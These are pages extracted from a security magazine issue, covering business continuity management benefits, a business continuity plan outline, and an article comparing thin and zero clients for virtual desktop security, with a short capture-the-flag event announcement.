• It needs you to consider interested parties affected by the BCMS and their requirements and plan out how, when and who you will communicate with • It makes sure that a BC strategy is developed, that defines acceptable timescales for resumption of activities for both you and your suppliers • It enables you to understand the impact of risks facing your organization • It requires cross organizational working • It needs you to test your plans and work jointly with partners and suppliers through exercising – making BC real, not just a paper-based exercise
• Reduces impact and frequency of business disruptions • Enhances your ability to respond when disruptions do occur • Gives you confidence in your responses and ensures appropriate and agile contingencies • Better stakeholder/interested party relationships
• It requires you to implement and maintain BC plans, helping you better manage disruptive incidents and continue activities • It calls for plans to be tested regularly to ensure they work and gives you confidence that you can deliver, on time as your customers and contracts dictate • It ensures you understand your role in your wider environment and supply chain
• Protects and enhances your reputation and credibility • Improves your ability to win tenders • Increases business growth, attracting more investors
• It requires you to evaluate the impact of a disruption based on your organization’s ability to operate over time • It makes sure you mitigate business continuity risks based on impact not the cause of incidents • It requires you to carry out regular risk assessments, including those affecting interested parties and the wider community • It makes you consider how each risk will be handled
• Greater visibility of business risks both externally and internally across the organization • Increases confidence in your recovery plans • Shows your clients and supply chain that you are committed to BC • Demonstrates a duty of care to staff, no matter what happens • Cost savings through mitigating impact of disruptions • Improves risk identification and brings about a consistent approach across your organization
• It requires top management involvement in the development and continual improvement of the BCMS • It makes sure top management provide the relevant resources to deliver the BCMS • It calls for top management to assign and communicate roles and responsibilities related to the BCMS • It requires top management’s “active engagement” in exercising
• Strengthens management commitment and ensures BCM is taken seriously • Increases employee engagement and understanding • Makes sure sufficient resources are available for BC testing and delivery • Gives visibility to employees, suppliers and customers of senior management’s commitment to BCM
Issue 23 22 | www.bluekaizen.org | 33
How to Prepare Business Continuity Pan Business Continuity Planning Phases 1. Project Initiation • Define Business Continuity Objective and Scope of coverage. • Establish a Business Continuity Steering Committee. • Draw up Business Continuity Policies.
PART I INTRODUCTION PART II DESIGN OF THE PLAN 1. Overview a Purpose a. Assumptions b. Development c. Maintenance e Testing
2. Business Analysis • Perform Risk Analysis and Business Impact Analysis. • Consider Alternative Business Continuity Strategies. • Carry out Cost-Benefit Analysis and select a Strategy. • Develop a Business Continuity Budget.
2. Organization of Disaster Response and Recovery a. Steering Committee b. Business Continuity Management Team c. Organization Support Teams d. Disaster Response e. Disaster Detection and Determination f. Disaster Notification
3. Design and Development (Designing the Plan) • Set up a Business Recovery Team and assign responsibility to the members. • Identify Plan Structure and major components • Develop Backup and Recovery Strategies. • Develop Scenario to Execute Plan. • Develop Escalation, Notification and Plan Activation Criteria. • Develop General Plan Administration Policy.
3. Initiation of the Business Continuity Plan a. Activation of a Site b. Dissemination of Public Information c. Disaster Recovery Strategy d. Emergency Phase e. Backup Phase f. Recovery Phase
4. Implementation (Creating the Plan) • Prepare Emergency Response Procedures. • Prepare Command Center Activation Procedures. • Prepare Detailed Recovery Procedures. • Prepare Vendors Contracts and Purchase of Recovery Resources. • Ensure everything necessary is in place. • Ensure Recovery Team members know their Duties and Responsibilities. 5. Testing • Exercise Plan based on selected Scenario. • Produce Test Report and Evaluate the Result. • Provide Training and Awareness to all Personnel. 6. Maintenance (Updating the Plan) • Review the Plan periodically. • Update the Plan with any Changes or Improvement. • Distribute the Plan to Recovery Team members.
4. a. b. c. d.
Scope of the Business Continuity Plan Category I - Critical Functions Category II - Essential Functions Category III - Necessary Functions Category IV - Desirable Functions
PART III TEAM DESCRIPTIONS 1. Business Continuity Management Team 2. Organization Support Teams b- Damage Assessment/ Salvage Team c- Transportation Team d- Physical Security Team e- Public Information Team f- Insurance Team g- Telecommunication Team PART IV RECOVERY PROCEDURES 1. Notification List - Contact Information for all the Teams’ members. 2. Action Procedures - List of Actions to be carried out by each Team.
Business Continuity Plan outline (simplified based on the sample BCP provided by MIT)
References http://www.thebci.org/index.php/resources/what-is-business-continuity http://www.thebci.org/index.php/resources/knowledgebank/cat_view/1-business-continuity/8-bcm-lifecycle https://www.sans.org/.../introduction-business-continuity
Issue 23 | Securitykaizen Magazine | 34
www.bluekaizen.org
Best Practice How to secure your network by using Virtual Desktop Infrastructure
The internal threats are the main security Challenge , now a days using private cloud with VDI (Virtual Desktop Infrastructure) in enterprise solution it could add some value controls to mitigates some of the internal information security threats .In 90â&#x20AC;&#x2122;s there was very little exchange of files between people. Most data was exchanged on floppy disks, USB Flash Memory; CDâ&#x20AC;&#x201C; RW that still a threat in the information security beside the Internet. Secure traditional PC Now is more difficult because of the security challenge by Internet and internal network attack the most incoming attack was in the breach of the Operating system and some application security breach.
Waleed Hamouda
AIBK Bank IT Security & Research Consultant Issue 23 | www.bluekaizen.org | 35
The threat of viruses/Trojans is high. Secure the traditional PC in network against Virus is takes time because of distributing A/V signatures update on each Traditional PC and the complexity of Viruses now Advanced Persistent Threat (APT) are a set of stealthy and continuous computer hacking processes that could be distribute in network before A/V detect . VDI is more secure than traditional Desktops, if you are able to centralize your data there are several benefits in security and Support, they are: 1. Proactive response to security incidents - If you deploy VDI and all of your desktop operating systems are running in a centralized data centre (or regional data centres throughout the world), then patching those Windows instances is able to be done more rapidly, distributing A/V signatures, HIPS agent updates, ..etc can be more rapidly accomplished than if those assets were spread over WAN links or frequently disconnected from the network as in the case of laptops. 2. Collapse branch infrastructure - If you are successful at deploying VDI at large scale you can probably collapse branch office file/print servers, email servers and maybe even app servers. 3. Data sharing - If all over your data is in one location, it will be much easier to share data among users without needing to worry about delays transmitting that data over WAN connections or having to worry about replicating data in multiple sites. 4. Data backup - If you data is located centrally it will be much easier to backup data and configure offsite data backups. If you data was spread over 100 different sites, you would potentially need multiple backup systems and multiple DR strategies. 5. eDiscovery - If you organization requires eDiscovery for audit purposes, having the data in one place makes this slightly easier. You will still of course need to address eDiscovery on any laptops, smartphones, tablets, etc. But it does make it a bit easier. 6. Protect against stolen (No more need to worry about stolen secrets or missing laptops) entire hardware as traditional PC like Hard Disk, Obviously VDI use Think Client or Zero Client has no potential to steal Hard Disk, or the Device itself because it will not work without Servers. 7. Reduce desktop support, management costs, and low power energy. Issue 23 | Securitykaizen Magazine | 36
VDI does that, traditional desktops cannot When you use Virtual Desktop Infrastructure (VDI) ? What is the different between Endpoint of Zero Clients and Thin Clients? Enterprises Business reach the decision to create a Virtual Desktop Infrastructure (VDI), there comes the question, “thin clients or zero clients?” Thin Clients and Zero Clients are both small form factor, solid state computing terminal devices, specifically designed for VDI, but they have many different characteristics as well. When choosing between thin clients and zero clients, you need to understand the benefits and the challenges of your VDI option that will help you to make the right choice, the required environment being deployed and the users’ needs on desktop. Virtual desktops are hosted in the data centre and the thin or Zero client simply serves as a terminal to the back-end server just like the concept of the Main Frame and Terminals in 70 seventies and 80 eighteens of last century, by using Zero or Thin Clients you avoid that three year lifecycle refresh on PCs by either repurposing these PCs as terminals or replacing those PCs with cheaper terminals and utilize the hardware that is more than user needs in Hard disk or Rams or CPU in PCs. VDI lets you push out compute resources from a server rather than having to install those resources directly onto the end-user’s device Like PC’s, Because VDI depend on the servers behind the scenes to handle the compute, you’re less likely to need to update or refresh the end point devices. In many ways thin clients and zero clients are similar, but what are the differences between the two? More importantly, which of the two types would be best for your IT environment? The Similarities Between Thin and Zero VDI Clients When you go to virtualization the infrastructure of the environment to support the VDI is based on the back end of the servers at Data Center both Zero and Thin VDI Clients has same benefits. • simple to install and replace • require less maintenance • improve security • reduce hardware needs than PC’s • rely on a network connection to a central server for full computing and don’t do much processing on the hardware itself • required Management system centralized
The Differences Between Thin and Zero VDI Clients Thin
Zero
own native operating systems, usually offering a version of Windows Embedded Standard (WES) or a Linux based operating system such as DeTOS.
have a highly tuned onboard processor specifically designed for one possibly three VDI protocols (PCoIP, HDX, or RemoteFX). Most of the decoding and display processes take place in dedicated hardware BIOS.
utilize connection protocols such as Citrix ICA or Microsoft RDP in order to remotely access a desktop that is being hosted on a Virtual Machine stored on a server
utilize connection protocols such as Citrix ICA or Microsoft RDP in order to remotely access a desktop that is being hosted on a Virtual Machine stored on a server
consider whether you need capabilities such as 3-D, video conferencing and multi-monitor support
Less speed with high 3-D , not support high Video and multi-monitor support
Booting on the embedded operating system then go to the Server.
have boot up speeds of just a few seconds and are immune to viruses
Need Maintenance for the Embedded operating system
requires very little maintenance only need Bios updated if significant change/enhancement.
require more setup
require less setup
The users options for what they can do is not limited
The users options for what they can do is more limited.
Which of the two types would be best for your IT Environment? Thin Clients offer video experience. You should also take into account your remote display protocol and how much display processing your back end can supply, if you user environment need some application with high video. If your users have standard application and inforce security and easy management you can go to Zero Clines. Both Zero and Thin Client devices rely on a network connection to a central server for full computing and donâ&#x20AC;&#x2122;t do much processing on the hardware itself. If you go to Thin client your thin client management software should be a powerful software product that combines thin client management capabilities with connection management features The first step on deciding between thin and zero clients really rests within the requirements of your network and the connection you prefer with your end uses.
References http://searchfinancialsecurity.techtarget.com/tip/ Security-benefits-of-virtual-desktop-infrastructures. http://www.racktopsystems.com/why-vdi-and-why-itseasier-than-ever-to-implement/ http://searchvirtualdesktop.techtarget.com/tip/WhatVDI-can-and-cant-do-for-you
Issue 23 | www.bluekaizen.org | 37
Capture the Flag competition at GISEC 2016 29th - 31st March Dubai World Trade Centre
CyberTalents.com in collaboration with DWTC, will be organizing the first Capture the Flag competition at GISEC 2016. www.cybertalents.com